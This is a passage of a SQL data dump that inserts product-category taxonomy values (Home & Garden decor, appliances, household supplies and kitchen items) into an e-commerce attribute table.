(3093, 3093, 0, 'Home & Garden > Decor > Weather Vanes & Roof Decor'),
(3094, 3094, 0, 'Home & Garden > Decor > Wind Chimes'),
(3095, 3095, 0, 'Home & Garden > Decor > Wind Wheels & Spinners'),
(3096, 3096, 0, 'Home & Garden > Decor > Window Magnets'),
(3097, 3097, 0, 'Home & Garden > Decor > Window Treatment Accessories'),
(3098, 3098, 0, 'Home & Garden > Decor > Window Treatment Accessories > Curtain & Drape Rings'),
(3099, 3099, 0, 'Home & Garden > Decor > Window Treatment Accessories > Curtain & Drape Rods'),
(3100, 3100, 0, 'Home & Garden > Decor > Window Treatment Accessories > Curtain Holdbacks & Tassels'),
(3101, 3101, 0, 'Home & Garden > Decor > Window Treatment Accessories > Window Treatment Replacement Parts'),
(3102, 3102, 0, 'Home & Garden > Decor > Window Treatments'),
(3103, 3103, 0, 'Home & Garden > Decor > Window Treatments > Curtains & Drapes'),
(3104, 3104, 0, 'Home & Garden > Decor > Window Treatments > Stained Glass Panels'),
(3105, 3105, 0, 'Home & Garden > Decor > Window Treatments > Window Blinds & Shades'),
(3106, 3106, 0, 'Home & Garden > Decor > Window Treatments > Window Films'),
(3107, 3107, 0, 'Home & Garden > Decor > Window Treatments > Window Screens'),
(3108, 3108, 0, 'Home & Garden > Decor > Window Treatments > Window Valances & Cornices'),
(3109, 3109, 0, 'Home & Garden > Decor > World Globes'),
(3110, 3110, 0, 'Home & Garden > Decor > Wreaths & Garlands'),
(3111, 3111, 0, 'Home & Garden > Emergency Preparedness'),
(3112, 3112, 0, 'Home & Garden > Emergency Preparedness > Earthquake Alarms'),
(3113, 3113, 0, 'Home & Garden > Emergency Preparedness > Emergency Blankets'),
(3114, 3114, 0, 'Home & Garden > Emergency Preparedness > Emergency Food Kits'),
(3115, 3115, 0, 'Home & Garden > Emergency Preparedness > Emergency Tools & Kits'),
(3116, 3116, 0, 'Home & Garden > Emergency Preparedness > Furniture Anchors'),
(3117, 3117, 0, 'Home & Garden > Fireplace & Wood Stove Accessories'),
(3118, 3118, 0, 'Home & Garden > Fireplace & Wood Stove Accessories > Bellows'),
(3119, 3119, 0, 'Home & Garden > Fireplace & Wood Stove Accessories > Fireplace & Wood Stove Grates'),
(3120, 3120, 0, 'Home & Garden > Fireplace & Wood Stove Accessories > Fireplace Andirons'),
(3121, 3121, 0, 'Home & Garden > Fireplace & Wood Stove Accessories > Fireplace Reflectors'),
(3122, 3122, 0, 'Home & Garden > Fireplace & Wood Stove Accessories > Fireplace Screens'),
(3123, 3123, 0, 'Home & Garden > Fireplace & Wood Stove Accessories > Fireplace Tools'),
(3124, 3124, 0, 'Home & Garden > Fireplace & Wood Stove Accessories > Firewood & Fuel'),
(3125, 3125, 0, 'Home & Garden > Fireplace & Wood Stove Accessories > Hearth Pads'),
(3126, 3126, 0, 'Home & Garden > Fireplace & Wood Stove Accessories > Log Rack & Carrier Accessories'),
(3127, 3127, 0, 'Home & Garden > Fireplace & Wood Stove Accessories > Log Racks & Carriers'),
(3128, 3128, 0, 'Home & Garden > Fireplace & Wood Stove Accessories > Wood Stove Fans & Blowers'),
(3129, 3129, 0, 'Home & Garden > Fireplaces'),
(3130, 3130, 0, 'Home & Garden > Flood, Fire & Gas Safety'),
(3131, 3131, 0, 'Home & Garden > Flood, Fire & Gas Safety > Fire Alarm Control Panels'),
(3132, 3132, 0, 'Home & Garden > Flood, Fire & Gas Safety > Fire Alarms'),
(3133, 3133, 0, 'Home & Garden > Flood, Fire & Gas Safety > Fire Extinguisher & Equipment Storage'),
(3134, 3134, 0, 'Home & Garden > Flood, Fire & Gas Safety > Fire Extinguishers'),
(3135, 3135, 0, 'Home & Garden > Flood, Fire & Gas Safety > Fire Sprinklers'),
(3136, 3136, 0, 'Home & Garden > Flood, Fire & Gas Safety > Heat Detectors'),
(3137, 3137, 0, 'Home & Garden > Flood, Fire & Gas Safety > Smoke & Carbon Monoxide Detectors'),
(3138, 3138, 0, 'Home & Garden > Flood, Fire & Gas Safety > Water & Flood Detectors'),
(3139, 3139, 0, 'Home & Garden > Household Appliance Accessories'),
(3140, 3140, 0, 'Home & Garden > Household Appliance Accessories > Air Conditioner Accessories'),
(3141, 3141, 0, 'Home & Garden > Household Appliance Accessories > Air Conditioner Accessories > Air Conditioner Covers'),
(3142, 3142, 0, 'Home & Garden > Household Appliance Accessories > Air Conditioner Accessories > Air Conditioner Filters'),
(3143, 3143, 0, 'Home & Garden > Household Appliance Accessories > Air Purifier Accessories'),
(3144, 3144, 0, 'Home & Garden > Household Appliance Accessories > Air Purifier Accessories > Air Purifier Filters'),
(3145, 3145, 0, 'Home & Garden > Household Appliance Accessories > Dehumidifier Accessories'),
(3146, 3146, 0, 'Home & Garden > Household Appliance Accessories > Fan Accessories'),
(3147, 3147, 0, 'Home & Garden > Household Appliance Accessories > Floor & Steam Cleaner Accessories'),
(3148, 3148, 0, 'Home & Garden > Household Appliance Accessories > Furnace & Boiler Accessories'),
(3149, 3149, 0, 'Home & Garden > Household Appliance Accessories > Heating Radiator Accessories'),
(3150, 3150, 0, 'Home & Garden > Household Appliance Accessories > Heating Radiator Accessories > Heating Radiator Reflectors'),
(3151, 3151, 0, 'Home & Garden > Household Appliance Accessories > Humidifier Accessories'),
(3152, 3152, 0, 'Home & Garden > Household Appliance Accessories > Humidifier Accessories > Humidifier Filters'),
(3153, 3153, 0, 'Home & Garden > Household Appliance Accessories > Laundry Appliance Accessories'),
(3154, 3154, 0, 'Home & Garden > Household Appliance Accessories > Laundry Appliance Accessories > Garment Steamer Accessories'),
(3155, 3155, 0, 'Home & Garden > Household Appliance Accessories > Laundry Appliance Accessories > Iron Accessories'),
(3156, 3156, 0, 'Home & Garden > Household Appliance Accessories > Laundry Appliance Accessories > Steam Press Accessories'),
(3157, 3157, 0, 'Home & Garden > Household Appliance Accessories > Laundry Appliance Accessories > Washer & Dryer Accessories'),
(3158, 3158, 0, 'Home & Garden > Household Appliance Accessories > Patio Heater Accessories'),
(3159, 3159, 0, 'Home & Garden > Household Appliance Accessories > Patio Heater Accessories > Patio Heater Covers'),
(3160, 3160, 0, 'Home & Garden > Household Appliance Accessories > Vacuum Accessories');
INSERT INTO `eav_attribute_option_value` (`value_id`, `option_id`, `store_id`, `value`) VALUES
(3161, 3161, 0, 'Home & Garden > Household Appliance Accessories > Water Heater Accessories'),
(3162, 3162, 0, 'Home & Garden > Household Appliance Accessories > Water Heater Accessories > Anode Rods'),
(3163, 3163, 0, 'Home & Garden > Household Appliance Accessories > Water Heater Accessories > Hot Water Tanks'),
(3164, 3164, 0, 'Home & Garden > Household Appliance Accessories > Water Heater Accessories > Water Heater Elements'),
(3165, 3165, 0, 'Home & Garden > Household Appliance Accessories > Water Heater Accessories > Water Heater Expansion Tanks'),
(3166, 3166, 0, 'Home & Garden > Household Appliance Accessories > Water Heater Accessories > Water Heater Pans'),
(3167, 3167, 0, 'Home & Garden > Household Appliance Accessories > Water Heater Accessories > Water Heater Stacks'),
(3168, 3168, 0, 'Home & Garden > Household Appliance Accessories > Water Heater Accessories > Water Heater Vents'),
(3169, 3169, 0, 'Home & Garden > Household Appliances'),
(3170, 3170, 0, 'Home & Garden > Household Appliances > Climate Control Appliances'),
(3171, 3171, 0, 'Home & Garden > Household Appliances > Climate Control Appliances > Air Conditioners'),
(3172, 3172, 0, 'Home & Garden > Household Appliances > Climate Control Appliances > Air Purifiers'),
(3173, 3173, 0, 'Home & Garden > Household Appliances > Climate Control Appliances > Dehumidifiers'),
(3174, 3174, 0, 'Home & Garden > Household Appliances > Climate Control Appliances > Duct Heaters'),
(3175, 3175, 0, 'Home & Garden > Household Appliances > Climate Control Appliances > Evaporative Coolers'),
(3176, 3176, 0, 'Home & Garden > Household Appliances > Climate Control Appliances > Fans'),
(3177, 3177, 0, 'Home & Garden > Household Appliances > Climate Control Appliances > Fans > Ceiling Fans'),
(3178, 3178, 0, 'Home & Garden > Household Appliances > Climate Control Appliances > Fans > Desk & Pedestal Fans'),
(3179, 3179, 0, 'Home & Garden > Household Appliances > Climate Control Appliances > Fans > Powered Hand Fans & Misters'),
(3180, 3180, 0, 'Home & Garden > Household Appliances > Climate Control Appliances > Fans > Ventilation Fans'),
(3181, 3181, 0, 'Home & Garden > Household Appliances > Climate Control Appliances > Fans > Wall Mount Fans'),
(3182, 3182, 0, 'Home & Garden > Household Appliances > Climate Control Appliances > Furnaces & Boilers'),
(3183, 3183, 0, 'Home & Garden > Household Appliances > Climate Control Appliances > Heating Radiators'),
(3184, 3184, 0, 'Home & Garden > Household Appliances > Climate Control Appliances > Humidifiers'),
(3185, 3185, 0, 'Home & Garden > Household Appliances > Climate Control Appliances > Outdoor Misting Systems'),
(3186, 3186, 0, 'Home & Garden > Household Appliances > Climate Control Appliances > Patio Heaters'),
(3187, 3187, 0, 'Home & Garden > Household Appliances > Climate Control Appliances > Space Heaters'),
(3188, 3188, 0, 'Home & Garden > Household Appliances > Floor & Carpet Dryers'),
(3189, 3189, 0, 'Home & Garden > Household Appliances > Floor & Steam Cleaners'),
(3190, 3190, 0, 'Home & Garden > Household Appliances > Floor Polishers & Buffers'),
(3191, 3191, 0, 'Home & Garden > Household Appliances > Futon Dryers'),
(3192, 3192, 0, 'Home & Garden > Household Appliances > Garage Door Keypads & Remotes'),
(3193, 3193, 0, 'Home & Garden > Household Appliances > Garage Door Openers'),
(3194, 3194, 0, 'Home & Garden > Household Appliances > Laundry Appliances'),
(3195, 3195, 0, 'Home & Garden > Household Appliances > Laundry Appliances > Dryers'),
(3196, 3196, 0, 'Home & Garden > Household Appliances > Laundry Appliances > Garment Steamers'),
(3197, 3197, 0, 'Home & Garden > Household Appliances > Laundry Appliances > Irons & Ironing Systems'),
(3198, 3198, 0, 'Home & Garden > Household Appliances > Laundry Appliances > Laundry Combo Units'),
(3199, 3199, 0, 'Home & Garden > Household Appliances > Laundry Appliances > Steam Presses'),
(3200, 3200, 0, 'Home & Garden > Household Appliances > Laundry Appliances > Washing Machines'),
(3201, 3201, 0, 'Home & Garden > Household Appliances > Ultrasonic Cleaners'),
(3202, 3202, 0, 'Home & Garden > Household Appliances > Vacuums'),
(3203, 3203, 0, 'Home & Garden > Household Appliances > Wallpaper Steamers'),
(3204, 3204, 0, 'Home & Garden > Household Appliances > Water Heaters'),
(3205, 3205, 0, 'Home & Garden > Household Supplies'),
(3206, 3206, 0, 'Home & Garden > Household Supplies > Drawer & Shelf Liners'),
(3207, 3207, 0, 'Home & Garden > Household Supplies > Floor Protection Films & Runners'),
(3208, 3208, 0, 'Home & Garden > Household Supplies > Furniture Floor Protectors'),
(3209, 3209, 0, 'Home & Garden > Household Supplies > Garage Floor Mats'),
(3210, 3210, 0, 'Home & Garden > Household Supplies > Garbage Bags'),
(3211, 3211, 0, 'Home & Garden > Household Supplies > Household Cleaning Supplies'),
(3212, 3212, 0, 'Home & Garden > Household Supplies > Household Cleaning Supplies > Broom & Mop Handles'),
(3213, 3213, 0, 'Home & Garden > Household Supplies > Household Cleaning Supplies > Broom Heads'),
(3214, 3214, 0, 'Home & Garden > Household Supplies > Household Cleaning Supplies > Brooms'),
(3215, 3215, 0, 'Home & Garden > Household Supplies > Household Cleaning Supplies > Buckets'),
(3216, 3216, 0, 'Home & Garden > Household Supplies > Household Cleaning Supplies > Carpet Sweepers'),
(3217, 3217, 0, 'Home & Garden > Household Supplies > Household Cleaning Supplies > Cleaning Gloves'),
(3218, 3218, 0, 'Home & Garden > Household Supplies > Household Cleaning Supplies > Duster Refills'),
(3219, 3219, 0, 'Home & Garden > Household Supplies > Household Cleaning Supplies > Dusters'),
(3220, 3220, 0, 'Home & Garden > Household Supplies > Household Cleaning Supplies > Dustpans'),
(3221, 3221, 0, 'Home & Garden > Household Supplies > Household Cleaning Supplies > Fabric & Upholstery Protectors'),
(3222, 3222, 0, 'Home & Garden > Household Supplies > Household Cleaning Supplies > Household Cleaning Products'),
(3223, 3223, 0, 'Home & Garden > Household Supplies > Household Cleaning Supplies > Household Cleaning Products > All-Purpose Cleaners'),
(3224, 3224, 0, 'Home & Garden > Household Supplies > Household Cleaning Supplies > Household Cleaning Products > Carpet Cleaners'),
(3225, 3225, 0, 'Home & Garden > Household Supplies > Household Cleaning Supplies > Household Cleaning Products > Descalers & Decalcifiers'),
(3226, 3226, 0, 'Home & Garden > Household Supplies > Household Cleaning Supplies > Household Cleaning Products > Dish Detergent & Soap'),
(3227, 3227, 0, 'Home & Garden > Household Supplies > Household Cleaning Supplies > Household Cleaning Products > Dishwasher Cleaners'),
(3228, 3228, 0, 'Home & Garden > Household Supplies > Household Cleaning Supplies > Household Cleaning Products > Fabric & Upholstery Cleaners'),
(3229, 3229, 0, 'Home & Garden > Household Supplies > Household Cleaning Supplies > Household Cleaning Products > Floor Cleaners'),
(3230, 3230, 0, 'Home & Garden > Household Supplies > Household Cleaning Supplies > Household Cleaning Products > Furniture Cleaners & Polish'),
(3231, 3231, 0, 'Home & Garden > Household Supplies > Household Cleaning Supplies > Household Cleaning Products > Glass & Surface Cleaners'),
(3232, 3232, 0, 'Home & Garden > Household Supplies > Household Cleaning Supplies > Household Cleaning Products > Household Disinfectants'),
(3233, 3233, 0, 'Home & Garden > Household Supplies > Household Cleaning Supplies > Household Cleaning Products > Oven & Grill Cleaners'),
(3234, 3234, 0, 'Home & Garden > Household Supplies > Household Cleaning Supplies > Household Cleaning Products > Pet Odor & Stain Removers'),
(3235, 3235, 0, 'Home & Garden > Household Supplies > Household Cleaning Supplies > Household Cleaning Products > Rinse Aids'),
(3236, 3236, 0, 'Home & Garden > Household Supplies > Household Cleaning Supplies > Household Cleaning Products > Stainless Steel Cleaners & Polishes'),
(3237, 3237, 0, 'Home & Garden > Household Supplies > Household Cleaning Supplies > Household Cleaning Products > Toilet Bowl Cleaners'),
(3238, 3238, 0, 'Home & Garden > Household Supplies > Household Cleaning Supplies > Household Cleaning Products > Tub & Tile Cleaners'),
(3239, 3239, 0, 'Home & Garden > Household Supplies > Household Cleaning Supplies > Household Cleaning Products > Washing Machine Cleaners'),
(3240, 3240, 0, 'Home & Garden > Household Supplies > Household Cleaning Supplies > Mop Heads & Refills'),
(3241, 3241, 0, 'Home & Garden > Household Supplies > Household Cleaning Supplies > Mops'),
(3242, 3242, 0, 'Home & Garden > Household Supplies > Household Cleaning Supplies > Scrub Brush Heads & Refills'),
(3243, 3243, 0, 'Home & Garden > Household Supplies > Household Cleaning Supplies > Scrub Brushes'),
(3244, 3244, 0, 'Home & Garden > Household Supplies > Household Cleaning Supplies > Shop Towels & General-Purpose Cleaning Cloths'),
(3245, 3245, 0, 'Home & Garden > Household Supplies > Household Cleaning Supplies > Sponges & Scouring Pads'),
(3246, 3246, 0, 'Home & Garden > Household Supplies > Household Cleaning Supplies > Squeegees'),
(3247, 3247, 0, 'Home & Garden > Household Supplies > Household Paper Products'),
(3248, 3248, 0, 'Home & Garden > Household Supplies > Household Paper Products > Facial Tissues'),
(3249, 3249, 0, 'Home & Garden > Household Supplies > Household Paper Products > Paper Napkins'),
(3250, 3250, 0, 'Home & Garden > Household Supplies > Household Paper Products > Paper Towels'),
(3251, 3251, 0, 'Home & Garden > Household Supplies > Household Paper Products > Toilet Paper'),
(3252, 3252, 0, 'Home & Garden > Household Supplies > Household Thermometers'),
(3253, 3253, 0, 'Home & Garden > Household Supplies > Laundry Supplies'),
(3254, 3254, 0, 'Home & Garden > Household Supplies > Laundry Supplies > Bleach'),
(3255, 3255, 0, 'Home & Garden > Household Supplies > Laundry Supplies > Clothespins'),
(3256, 3256, 0, 'Home & Garden > Household Supplies > Laundry Supplies > Dry Cleaning Kits'),
(3257, 3257, 0, 'Home & Garden > Household Supplies > Laundry Supplies > Drying Racks & Hangers'),
(3258, 3258, 0, 'Home & Garden > Household Supplies > Laundry Supplies > Fabric Refreshers'),
(3259, 3259, 0, 'Home & Garden > Household Supplies > Laundry Supplies > Fabric Shavers'),
(3260, 3260, 0, 'Home & Garden > Household Supplies > Laundry Supplies > Fabric Softeners & Dryer Sheets'),
(3261, 3261, 0, 'Home & Garden > Household Supplies > Laundry Supplies > Fabric Stain Removers'),
(3262, 3262, 0, 'Home & Garden > Household Supplies > Laundry Supplies > Fabric Starch'),
(3263, 3263, 0, 'Home & Garden > Household Supplies > Laundry Supplies > Garment Shields'),
(3264, 3264, 0, 'Home & Garden > Household Supplies > Laundry Supplies > Iron Rests'),
(3265, 3265, 0, 'Home & Garden > Household Supplies > Laundry Supplies > Ironing Board Pads & Covers'),
(3266, 3266, 0, 'Home & Garden > Household Supplies > Laundry Supplies > Ironing Board Replacement Parts'),
(3267, 3267, 0, 'Home & Garden > Household Supplies > Laundry Supplies > Ironing Boards'),
(3268, 3268, 0, 'Home & Garden > Household Supplies > Laundry Supplies > Laundry Balls'),
(3269, 3269, 0, 'Home & Garden > Household Supplies > Laundry Supplies > Laundry Baskets'),
(3270, 3270, 0, 'Home & Garden > Household Supplies > Laundry Supplies > Laundry Detergent'),
(3271, 3271, 0, 'Home & Garden > Household Supplies > Laundry Supplies > Laundry Wash Bags & Frames'),
(3272, 3272, 0, 'Home & Garden > Household Supplies > Laundry Supplies > Lint Rollers'),
(3273, 3273, 0, 'Home & Garden > Household Supplies > Laundry Supplies > Wrinkle Releasers & Anti-Static Sprays'),
(3274, 3274, 0, 'Home & Garden > Household Supplies > Moisture Absorbers'),
(3275, 3275, 0, 'Home & Garden > Household Supplies > Pest Control'),
(3276, 3276, 0, 'Home & Garden > Household Supplies > Pest Control > Fly Swatters'),
(3277, 3277, 0, 'Home & Garden > Household Supplies > Pest Control > Pest Control Traps'),
(3278, 3278, 0, 'Home & Garden > Household Supplies > Pest Control > Pesticides'),
(3279, 3279, 0, 'Home & Garden > Household Supplies > Pest Control > Repellents'),
(3280, 3280, 0, 'Home & Garden > Household Supplies > Pest Control > Repellents > Animal & Pet Repellents'),
(3281, 3281, 0, 'Home & Garden > Household Supplies > Pest Control > Repellents > Household Insect Repellents'),
(3282, 3282, 0, 'Home & Garden > Household Supplies > Rug Pads'),
(3283, 3283, 0, 'Home & Garden > Household Supplies > Shoe Care & Tools'),
(3284, 3284, 0, 'Home & Garden > Household Supplies > Shoe Care & Tools > Boot Pulls'),
(3285, 3285, 0, 'Home & Garden > Household Supplies > Shoe Care & Tools > Shoe Bags'),
(3286, 3286, 0, 'Home & Garden > Household Supplies > Shoe Care & Tools > Shoe Brushes'),
(3287, 3287, 0, 'Home & Garden > Household Supplies > Shoe Care & Tools > Shoe Care Kits'),
(3288, 3288, 0, 'Home & Garden > Household Supplies > Shoe Care & Tools > Shoe Dryers'),
(3289, 3289, 0, 'Home & Garden > Household Supplies > Shoe Care & Tools > Shoe Horns & Dressing Aids'),
(3290, 3290, 0, 'Home & Garden > Household Supplies > Shoe Care & Tools > Shoe Polishers'),
(3291, 3291, 0, 'Home & Garden > Household Supplies > Shoe Care & Tools > Shoe Polishes & Waxes'),
(3292, 3292, 0, 'Home & Garden > Household Supplies > Shoe Care & Tools > Shoe Scrapers'),
(3293, 3293, 0, 'Home & Garden > Household Supplies > Shoe Care & Tools > Shoe Treatments & Dyes'),
(3294, 3294, 0, 'Home & Garden > Household Supplies > Shoe Care & Tools > Shoe Trees & Shapers'),
(3295, 3295, 0, 'Home & Garden > Household Supplies > Stair Treads'),
(3296, 3296, 0, 'Home & Garden > Household Supplies > Storage & Organization'),
(3297, 3297, 0, 'Home & Garden > Household Supplies > Storage & Organization > Clothing & Closet Storage'),
(3298, 3298, 0, 'Home & Garden > Household Supplies > Storage & Organization > Clothing & Closet Storage > Charging Valets'),
(3299, 3299, 0, 'Home & Garden > Household Supplies > Storage & Organization > Clothing & Closet Storage > Closet Organizers & Garment Racks'),
(3300, 3300, 0, 'Home & Garden > Household Supplies > Storage & Organization > Clothing & Closet Storage > Clothes Valets'),
(3301, 3301, 0, 'Home & Garden > Household Supplies > Storage & Organization > Clothing & Closet Storage > Hangers'),
(3302, 3302, 0, 'Home & Garden > Household Supplies > Storage & Organization > Clothing & Closet Storage > Hat Boxes'),
(3303, 3303, 0, 'Home & Garden > Household Supplies > Storage & Organization > Clothing & Closet Storage > Shoe Racks & Organizers'),
(3304, 3304, 0, 'Home & Garden > Household Supplies > Storage & Organization > Flatware Chests'),
(3305, 3305, 0, 'Home & Garden > Household Supplies > Storage & Organization > Household Drawer Organizer Inserts'),
(3306, 3306, 0, 'Home & Garden > Household Supplies > Storage & Organization > Household Storage Bags'),
(3307, 3307, 0, 'Home & Garden > Household Supplies > Storage & Organization > Household Storage Caddies'),
(3308, 3308, 0, 'Home & Garden > Household Supplies > Storage & Organization > Household Storage Containers'),
(3309, 3309, 0, 'Home & Garden > Household Supplies > Storage & Organization > Household Storage Drawers'),
(3310, 3310, 0, 'Home & Garden > Household Supplies > Storage & Organization > Photo Storage'),
(3311, 3311, 0, 'Home & Garden > Household Supplies > Storage & Organization > Photo Storage > Photo Albums'),
(3312, 3312, 0, 'Home & Garden > Household Supplies > Storage & Organization > Photo Storage > Photo Storage Boxes'),
(3313, 3313, 0, 'Home & Garden > Household Supplies > Storage & Organization > Storage Hooks & Racks'),
(3314, 3314, 0, 'Home & Garden > Household Supplies > Storage & Organization > Storage Hooks & Racks > Ironing Board Hooks & Racks'),
(3315, 3315, 0, 'Home & Garden > Household Supplies > Storage & Organization > Storage Hooks & Racks > Umbrella Stands & Racks'),
(3316, 3316, 0, 'Home & Garden > Household Supplies > Storage & Organization > Storage Hooks & Racks > Utility Hooks'),
(3317, 3317, 0, 'Home & Garden > Household Supplies > Trash Compactor Accessories'),
(3318, 3318, 0, 'Home & Garden > Household Supplies > Waste Containment'),
(3319, 3319, 0, 'Home & Garden > Household Supplies > Waste Containment > Dumpsters'),
(3320, 3320, 0, 'Home & Garden > Household Supplies > Waste Containment > Hazardous Waste Containers'),
(3321, 3321, 0, 'Home & Garden > Household Supplies > Waste Containment > Recycling Containers'),
(3322, 3322, 0, 'Home & Garden > Household Supplies > Waste Containment > Trash Cans & Wastebaskets'),
(3323, 3323, 0, 'Home & Garden > Household Supplies > Waste Containment Accessories'),
(3324, 3324, 0, 'Home & Garden > Household Supplies > Waste Containment Accessories > Waste Container Carts'),
(3325, 3325, 0, 'Home & Garden > Household Supplies > Waste Containment Accessories > Waste Container Enclosures'),
(3326, 3326, 0, 'Home & Garden > Household Supplies > Waste Containment Accessories > Waste Container Labels & Signs'),
(3327, 3327, 0, 'Home & Garden > Household Supplies > Waste Containment Accessories > Waste Container Lids'),
(3328, 3328, 0, 'Home & Garden > Household Supplies > Waste Containment Accessories > Waste Container Wheels'),
(3329, 3329, 0, 'Home & Garden > Kitchen & Dining'),
(3330, 3330, 0, 'Home & Garden > Kitchen & Dining > Barware'),
(3331, 3331, 0, 'Home & Garden > Kitchen & Dining > Barware > Absinthe Fountains'),
(3332, 3332, 0, 'Home & Garden > Kitchen & Dining > Barware > Beer Dispensers & Taps'),
(3333, 3333, 0, 'Home & Garden > Kitchen & Dining > Barware > Beverage Chilling Cubes & Sticks'),
(3334, 3334, 0, 'Home & Garden > Kitchen & Dining > Barware > Beverage Tubs & Chillers'),
(3335, 3335, 0, 'Home & Garden > Kitchen & Dining > Barware > Bottle Caps'),
(3336, 3336, 0, 'Home & Garden > Kitchen & Dining > Barware > Bottle Stoppers & Savers'),
(3337, 3337, 0, 'Home & Garden > Kitchen & Dining > Barware > Coaster Holders'),
(3338, 3338, 0, 'Home & Garden > Kitchen & Dining > Barware > Coasters'),
(3339, 3339, 0, 'Home & Garden > Kitchen & Dining > Barware > Cocktail & Barware Tool Sets'),
(3340, 3340, 0, 'Home & Garden > Kitchen & Dining > Barware > Cocktail Shakers & Tools'),
(3341, 3341, 0, 'Home & Garden > Kitchen & Dining > Barware > Cocktail Shakers & Tools > Bar Ice Picks'),
(3342, 3342, 0, 'Home & Garden > Kitchen & Dining > Barware > Cocktail Shakers & Tools > Bottle Openers'),
(3343, 3343, 0, 'Home & Garden > Kitchen & Dining > Barware > Cocktail Shakers & Tools > Cocktail Shakers'),
(3344, 3344, 0, 'Home & Garden > Kitchen & Dining > Barware > Cocktail Shakers & Tools > Cocktail Strainers'),
(3345, 3345, 0, 'Home & Garden > Kitchen & Dining > Barware > Cocktail Shakers & Tools > Muddlers'),
(3346, 3346, 0, 'Home & Garden > Kitchen & Dining > Barware > Corkscrews'),
(3347, 3347, 0, 'Home & Garden > Kitchen & Dining > Barware > Decanters'),
(3348, 3348, 0, 'Home & Garden > Kitchen & Dining > Barware > Foil Cutters'),
(3349, 3349, 0, 'Home & Garden > Kitchen & Dining > Barware > Wine Aerators'),
(3350, 3350, 0, 'Home & Garden > Kitchen & Dining > Barware > Wine Bottle Holders'),
(3351, 3351, 0, 'Home & Garden > Kitchen & Dining > Barware > Wine Glass Charms'),
(3352, 3352, 0, 'Home & Garden > Kitchen & Dining > Cookware & Bakeware'),
(3353, 3353, 0, 'Home & Garden > Kitchen & Dining > Cookware & Bakeware > Bakeware'),
(3354, 3354, 0, 'Home & Garden > Kitchen & Dining > Cookware & Bakeware > Bakeware > Bakeware Sets'),
(3355, 3355, 0, 'Home & Garden > Kitchen & Dining > Cookware & Bakeware > Bakeware > Baking & Cookie Sheets'),
(3356, 3356, 0, 'Home & Garden > Kitchen & Dining > Cookware & Bakeware > Bakeware > Bread Pans & Molds'),
(3357, 3357, 0, 'Home & Garden > Kitchen & Dining > Cookware & Bakeware > Bakeware > Broiling Pans'),
(3358, 3358, 0, 'Home & Garden > Kitchen & Dining > Cookware & Bakeware > Bakeware > Cake Pans & Molds'),
(3359, 3359, 0, 'Home & Garden > Kitchen & Dining > Cookware & Bakeware > Bakeware > Muffin & Pastry Pans'),
(3360, 3360, 0, 'Home & Garden > Kitchen & Dining > Cookware & Bakeware > Bakeware > Pie & Quiche Pans'),
(3361, 3361, 0, 'Home & Garden > Kitchen & Dining > Cookware & Bakeware > Bakeware > Pizza Pans'),
(3362, 3362, 0, 'Home & Garden > Kitchen & Dining > Cookware & Bakeware > Bakeware > Pizza Stones'),
(3363, 3363, 0, 'Home & Garden > Kitchen & Dining > Cookware & Bakeware > Bakeware > Ramekins & Souffle Dishes'),
(3364, 3364, 0, 'Home & Garden > Kitchen & Dining > Cookware & Bakeware > Bakeware > Roasting Pans'),
(3365, 3365, 0, 'Home & Garden > Kitchen & Dining > Cookware & Bakeware > Bakeware Accessories'),
(3366, 3366, 0, 'Home & Garden > Kitchen & Dining > Cookware & Bakeware > Bakeware Accessories > Baking Mats & Liners'),
(3367, 3367, 0, 'Home & Garden > Kitchen & Dining > Cookware & Bakeware > Bakeware Accessories > Baking Weights'),
(3368, 3368, 0, 'Home & Garden > Kitchen & Dining > Cookware & Bakeware > Bakeware Accessories > Roasting Pan Racks'),
(3369, 3369, 0, 'Home & Garden > Kitchen & Dining > Cookware & Bakeware > Cookware'),
(3370, 3370, 0, 'Home & Garden > Kitchen & Dining > Cookware & Bakeware > Cookware & Bakeware Combo Sets'),
(3371, 3371, 0, 'Home & Garden > Kitchen & Dining > Cookware & Bakeware > Cookware > Casserole Dishes'),
(3372, 3372, 0, 'Home & Garden > Kitchen & Dining > Cookware & Bakeware > Cookware > Cookware Sets'),
(3373, 3373, 0, 'Home & Garden > Kitchen & Dining > Cookware & Bakeware > Cookware > CrÃªpe & Blini Pans'),
(3374, 3374, 0, 'Home & Garden > Kitchen & Dining > Cookware & Bakeware > Cookware > Double Boilers'),
(3375, 3375, 0, 'Home & Garden > Kitchen & Dining > Cookware & Bakeware > Cookware > Dutch Ovens'),
(3376, 3376, 0, 'Home & Garden > Kitchen & Dining > Cookware & Bakeware > Cookware > Fermentation & Pickling Crocks'),
(3377, 3377, 0, 'Home & Garden > Kitchen & Dining > Cookware & Bakeware > Cookware > Griddles & Grill Pans'),
(3378, 3378, 0, 'Home & Garden > Kitchen & Dining > Cookware & Bakeware > Cookware > Grill Presses'),
(3379, 3379, 0, 'Home & Garden > Kitchen & Dining > Cookware & Bakeware > Cookware > Paella Pans'),
(3380, 3380, 0, 'Home & Garden > Kitchen & Dining > Cookware & Bakeware > Cookware > Pressure Cookers & Canners'),
(3381, 3381, 0, 'Home & Garden > Kitchen & Dining > Cookware & Bakeware > Cookware > Saucepans'),
(3382, 3382, 0, 'Home & Garden > Kitchen & Dining > Cookware & Bakeware > Cookware > SautÃ© Pans'),
(3383, 3383, 0, 'Home & Garden > Kitchen & Dining > Cookware & Bakeware > Cookware > Skillets & Frying Pans'),
(3384, 3384, 0, 'Home & Garden > Kitchen & Dining > Cookware & Bakeware > Cookware > Stock Pots'),
(3385, 3385, 0, 'Home & Garden > Kitchen & Dining > Cookware & Bakeware > Cookware > Stovetop Kettles'),
(3386, 3386, 0, 'Home & Garden > Kitchen & Dining > Cookware & Bakeware > Cookware > Tagines & Clay Cooking Pots'),
(3387, 3387, 0, 'Home & Garden > Kitchen & Dining > Cookware & Bakeware > Cookware > Woks'),
(3388, 3388, 0, 'Home & Garden > Kitchen & Dining > Cookware & Bakeware > Cookware Accessories'),
(3389, 3389, 0, 'Home & Garden > Kitchen & Dining > Cookware & Bakeware > Cookware Accessories > Pot & Pan Handles'),
(3390, 3390, 0, 'Home & Garden > Kitchen & Dining > Cookware & Bakeware > Cookware Accessories > Pot & Pan Lids'),
(3391, 3391, 0, 'Home & Garden > Kitchen & Dining > Cookware & Bakeware > Cookware Accessories > Pressure Cooker & Canner Accessories'),
(3392, 3392, 0, 'Home & Garden > Kitchen & Dining > Cookware & Bakeware > Cookware Accessories > Steamer Baskets'),
(3393, 3393, 0, 'Home & Garden > Kitchen & Dining > Cookware & Bakeware > Cookware Accessories > Wok Accessories'),
